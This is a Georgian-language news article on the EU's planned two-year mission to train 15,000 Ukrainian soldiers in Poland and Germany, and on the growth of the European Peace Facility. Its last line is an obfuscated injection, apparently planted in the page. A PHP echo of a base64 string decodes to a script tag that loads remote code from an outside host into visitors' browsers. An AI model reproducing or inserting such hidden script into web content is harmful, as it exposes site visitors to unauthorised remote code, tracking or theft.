celsiusi
ავერსი შნაიდერი
ევროკავშირი 15 000 უკრაინელ სამხედრო მოსამსახურეს გაწვრთნის. ჯარისკაცების მომზადების ცენტრები გერმანიასა და პოლონეთში იქნება განლაგებული. ამის შესახებ ინფორმაციას გერმანული მედია ავრცელებს.
 
როგორც ჟურნალისტებმა ევროკავშირის მაღალჩინოსნისგან შეიტყვეს, მისიის მიზანია, უკრაინამ დამოუკიდებლად შეძლოს ტერიტორიული მთლიანობისა და სუვერენიტეტის დაცვა, ხოლო მისი მანდატი ორწლიანი იქნება.
 
გერმანული მედიის ცნობით, უკვე მიღებულია გადაწყვეტილება, რათა სწრაფად ჩამოყალიბდეს შესაბამისი სტრუქტურები და მოდულები, რომლებიც უკრაინელი ჯარისკაცების წვრთნაზე იქნებიან პასუხისმგებელნი.
 
წინასწარი ცნობით, პოლონეთი უკრაინელ სამხედროებს ქიმიური, ბიოლოგიური და ბირთვული იარაღისგან თავდაცვას, ასევე სამედიცინო დახმარების გაწევას და კიბერთავდამსხმელებისგან დაცვას შეასწავლის. პროგრამა აგრეთვე ითვალისწინებს სამხედროების მიერ ლოჯისტიკის, იარაღის შეკეთების, ქალაქის პირობებში საბრძოლო მოქმედებების წარმოების, ანტისაჰაერო თავდაცვის სისტემების ორგანიზებისა და არტილერიის განლაგების შესწავლას.
 
​გერმანიაში კი უკრაინელი სამხედროები ტერიტორიების განაღმვას და ომის წარმოების ტაქტიკას შეისწავლიან.
 
გერმანული მედია წერს, რომ ჯარისკაცებისთვის სასწავლო კურსები ევროკავშირის სხვა ქვეყნებშიც ჩატარდება.
 
მათივე ცნობით, ევროკავშირის საწვრთნელი მისიის შესახებ გადაწყვეტილება 17 ოქტომბერს ევროკავშირის საგარეო საქმეთა მინისტრების შეხვედრაზე დამტკიცდება.
 
ამასთან, ევროკავშირი უახლოეს ხანში აპირებს მნიშვნელოვნად გაზარდოს უკრაინის სამხედრო დახმარება. ამ მიზნით ევროპის მშვიდობის ფონდის მოცულობა 2027 წლისთვის 5,7 მილიარდიდან 10-12 მილიარდ ევრომდე გაიზრდება. ამ თანხით ნაწილობრივ დაფინანსდება უკრაინისთვის საჭირო შეიარაღების მიწოდება. თუმცა, ჯერ ამასთან დაკავშირებით კონკრეტული გადაწყვეტილებები არ მიღებულა.
413
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");